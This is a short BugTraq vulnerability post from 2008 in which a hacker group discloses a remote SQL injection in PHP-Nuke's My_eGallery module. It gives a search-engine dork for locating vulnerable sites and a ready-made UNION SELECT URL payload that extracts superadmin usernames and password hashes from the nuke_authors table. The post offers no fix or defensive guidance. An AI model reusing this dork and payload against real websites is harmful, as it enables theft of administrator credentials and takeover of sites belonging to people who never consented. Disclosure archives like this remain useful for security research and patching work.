BugTraq
PHP-Nuke My_eGallery "gid" Remote SQL Injection Feb 28 2008 03:27AM
no-reply aria-security net
Aria-Security Team

http://Aria-Security.Net

-----------------------------

Shoutz: Aura, Null, imm02tal, Kinglet, and our staff

PHP-Nuke My_eGallery "gid" Remote SQL Injection

Dork: inurl:"modules.php?name=My_eGallery"

modules.php?op=modload&name=My_eGallery&file=index&do=showgall&gid=-1/**
/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsu
per=1/*

The-0utl4w

From Aria-Security.Net

Original Link: http://forum.aria-security.net/showthread.php?p=1490

[ reply ]
 

Privacy Statement
Copyright 2010, SecurityFocus